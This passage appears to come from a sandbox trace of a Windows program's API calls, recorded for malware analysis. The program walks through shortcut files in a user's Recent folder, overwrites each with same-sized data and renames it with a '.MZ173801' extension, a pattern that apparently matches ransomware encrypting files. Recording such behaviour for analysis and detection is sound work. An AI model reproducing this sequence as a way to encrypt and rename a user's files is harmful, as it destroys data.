lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.277] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0112.277] GetCurrentThreadId () returned 0x1358 [0112.277] GetCurrentThreadId () returned 0x1358 [0112.277] GetCurrentThreadId () returned 0x1358 [0112.277] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\x-fqzeifd646TQM_WO.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\x-fqzeifd646tqm_wo.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.277] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0112.278] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.278] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x2b0 [0112.278] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.278] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x2b0, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x2b0, lpOverlapped=0x0) returned 1 [0112.278] CloseHandle (hObject=0x3f4) returned 1 [0112.279] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\x-fqzeifd646TQM_WO.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\x-fqzeifd646tqm_wo.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.279] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x2b0, lpOverlapped=0x0) returned 1 [0112.280] CloseHandle (hObject=0x3f4) returned 1 [0112.281] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\x-fqzeifd646TQM_WO.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\x-fqzeifd646tqm_wo.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\x-fqzeifd646TQM_WO.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\x-fqzeifd646tqm_wo.lnk.mz173801")) returned 1 [0112.282] GetCurrentThreadId () returned 0x1358 [0112.282] GetCurrentThreadId () returned 0x1358 [0112.282] GetCurrentThreadId () returned 0x1358 [0112.282] GetCurrentThreadId () returned 0x1358 [0112.282] GetCurrentThreadId () returned 0x1358 [0112.282] GetCurrentThreadId () returned 0x1358 [0112.282] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x869ed3ef, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x869ed3ef, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x869ed3ef, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x441, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="XbxN-s5VyE.lnk", cAlternateFileName="XBXN-S~1.LNK")) returned 1 [0112.282] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0112.282] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0112.282] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XbxN-s5VyE.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\xbxn-s5vye.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x869ed3ef, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x869ed3ef, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x869ed3ef, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x441)) returned 1 [0112.282] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.282] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0112.283] GetCurrentThreadId () returned 0x1358 [0112.283] GetCurrentThreadId () returned 0x1358 [0112.283] GetCurrentThreadId () returned 0x1358 [0112.283] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.283] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0112.283] GetCurrentThreadId () returned 0x1358 [0112.283] GetCurrentThreadId () returned 0x1358 [0112.283] GetCurrentThreadId () returned 0x1358 [0112.284] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XbxN-s5VyE.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\xbxn-s5vye.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.284] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0112.284] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.284] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x441 [0112.284] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.284] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x441, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x441, lpOverlapped=0x0) returned 1 [0112.285] CloseHandle (hObject=0x3f4) returned 1 [0112.285] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XbxN-s5VyE.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\xbxn-s5vye.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.286] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x441, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x441, lpOverlapped=0x0) returned 1 [0112.287] CloseHandle (hObject=0x3f4) returned 1 [0112.287] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XbxN-s5VyE.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\xbxn-s5vye.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XbxN-s5VyE.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\xbxn-s5vye.lnk.mz173801")) returned 1 [0112.288] GetCurrentThreadId () returned 0x1358 [0112.288] GetCurrentThreadId () returned 0x1358 [0112.288] GetCurrentThreadId () returned 0x1358 [0112.288] GetCurrentThreadId () returned 0x1358 [0112.288] GetCurrentThreadId () returned 0x1358 [0112.288] GetCurrentThreadId () returned 0x1358 [0112.288] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6aa375, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x8153085c, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x8153085c, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x23b, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="XDnTXxKBW.lnk", cAlternateFileName="XDNTXX~1.LNK")) returned 1 [0112.288] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0112.288] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0112.288] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\XDnTXxKBW.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\xdntxxkbw.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6aa375, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x8153085c, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x8153085c, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x23b)) returned 1 [0112.289] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.289] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 